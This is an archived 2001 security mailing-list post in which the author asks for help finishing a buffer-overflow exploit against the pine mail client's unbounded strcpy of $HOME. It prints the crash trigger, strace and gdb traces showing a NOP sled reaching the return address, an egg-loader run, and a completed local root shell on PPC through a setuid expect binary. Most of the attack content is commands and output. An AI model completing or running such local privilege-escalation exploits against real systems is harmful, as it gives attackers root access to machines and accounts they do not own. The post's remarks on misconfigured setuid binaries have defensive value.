
Pine


From: Charles Stevenson <core () ezlink com>
Date: Wed, 11 Jul 2001 20:56:51 -0600

Hi all,

Has anyone ever coded a pine exploit?  I know it is vulnerable to an
unbounded strcpy() of $HOME, an environment variable the invoking user
fully controls.  And I have seen it installed setuid or setgid to one
account or another on several ISPs, even though it never should be!
(The strace below shows getegid() returning 11 while getgid() returns 0,
which is consistent with the binary on this box being setgid.  Note also
that getuid() is 0 there: I am running these tests as root, so a
successful overflow here would not by itself demonstrate any privilege
gain -- that has to be tested as an unprivileged user against the
privileged binary.)  What are the implications of this with pine itself:
can you simply run a command from within it?  I don't think pine was
designed to be run setuid, and I'm not sure why anyone would give it such
permissions.

[-(root@devastator:~/bleedingedge)> export HOME=`perl -e 'print "i" x
6969'`           [-(:1-07-11-20:20:51)-]<p0>
[-(root@devastator:/home/core/bleedingedge)>
pine                                      [-(:1-07-11-20:21:10)-]<p0>
zsh: segmentation fault  pine
[-(root@devastator:/home/core/bleedingedge)> strace
pine                               [-(:1-07-11-20:21:12)-]<p0>
execve("/usr/bin/pine", ["pine"], [/* 20 vars */]) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40007000
mprotect(0x40000000, 20353, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x8048000, 1352085, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
stat("/etc/ld.so.cache", {st_mode=S_IFREG|0644, st_size=8183, ...}) = 0
open("/etc/ld.so.cache", O_RDONLY)      = 3
mmap(0, 8183, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000
close(3)                                = 0
stat("/etc/ld.so.preload", 0xbfffe180)  = -1 ENOENT (No such file or
directory)
open("/lib/libtermcap.so.2", O_RDONLY)  = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 12288, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000a000
mmap(0x4000a000, 7276, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0)
= 0x4000a000
mmap(0x4000c000, 3496, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
0x1000) = 0x4000c000
close(3)                                = 0
mprotect(0x4000a000, 7276, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
open("/lib/libc.so.5", O_RDONLY)        = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 831488, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4000d000
mmap(0x4000d000, 599154, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3,
0) = 0x4000d000
mmap(0x400a0000, 22664, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
0x92000) = 0x400a0000
mmap(0x400a6000, 200812, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400a6000
close(3)                                = 0
mprotect(0x4000d000, 599154, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
munmap(0x40008000, 8183)                = 0
mprotect(0x8048000, 1352085, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000a000, 7276, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000d000, 599154, PROT_READ|PROT_EXEC) = 0
mprotect(0x40000000, 20353, PROT_READ|PROT_EXEC) = 0
personality(PER_LINUX)                  = 0
geteuid()                               = 0
getuid()                                = 0
getgid()                                = 0
getegid()                               = 11
brk(0x81abb88)                          = 0x81abb88
brk(0x81ac000)                          = 0x81ac000
getpid()                                = 21010
time(NULL)                              = 994904475
getuid()                                = 0
open("/etc/nsswitch.conf", O_RDONLY)    = 3
brk(0x81af000)                          = 0x81af000
fstat(3, {st_mode=S_IFREG|0644, st_size=1215, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40008000
read(3, "#\n# /etc/nsswitch.conf\n#\n# An"..., 4096) = 1215
read(3, "", 4096)                       = 0
close(3)                                = 0
munmap(0x40008000, 4096)                = 0
open("/etc/passwd", O_RDONLY)           = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=28709, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40008000
read(3, "root:x:0:0::/root:/bin/sh\ndaemo"..., 4096) = 4096
lseek(3, -4070, SEEK_CUR)               = 26
close(3)                                = 0
munmap(0x40008000, 4096)                = 0
brk(0x81b1000)                          = 0x81b1000
ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

[-(root@devastator:~/bleedingedge/test)>
./exploit4                                   
[-(:1-07-11-20:34:22)-]<p0>
Using address: 0xbffffcc4
[root@devastator ~/bleedingedge/test]# export HOME=$EGG
[root@devastator /home/core/bleedingedge/test]# gdb pine
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for
details.
GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation,
Inc...
(gdb) r
Starting program: /usr/bin/pine 
zsh: path too long: .zshenv

Program received signal SIGSEGV, Segmentation fault.
0x4007a43f in strcpy ()
(gdb) bt
#0  0x4007a43f in strcpy ()
#1  0x804a590 in _start ()
#2  0x90909090 in ?? ()
Cannot access memory at address 0x90909090.
(gdb) frame 0
#0  0x4007a43f in strcpy ()
(gdb) list
pine.c:252: No such file or directory.


Also, I'm not quite understanding how to code overflows on x86.  I can't
seem to gain control of EIP: my attempts on expect and pine both just
segfault.  Can someone tell me what I'm missing?  (In the backtrace above
the fault is raised inside strcpy() itself, yet frame #2 already reads
0x90909090 -- i.e. the saved return address looks to be overwritten by
the NOP sled, but the copy faults before the function ever returns into
it.  A 6969-byte HOME may simply be running the copy off the end of the
stack; a shorter payload that lets strcpy() complete seems worth trying.)
It's harder on x86 but easier on the PPC arch.  :)

I mean it works so well on my iBook!

[ Buffer size:  512             Egg size:       2048    Aligment:      
0]
[ Address:      0x100111f8      Offset:         0                       
]
sh-2.05$ export HOME=$EGG
sh-2.05$ expect
sh-2.05# id
uid=0(root) gid=1000(core)
groups=1000(core),4(adm),24(cdrom),29(audio),30(dip)
sh-2.05# 

I don't feel like building pine for PPC, but I'm sure it's just as
simple.  (The expect session above goes from an unprivileged shell to
uid=0 while keeping gid=1000(core), so that one really is a local root
via the setuid binary, not just a crash.)

Thanks in advance for any x86 help.

Best Regards,
Charles Stevenson

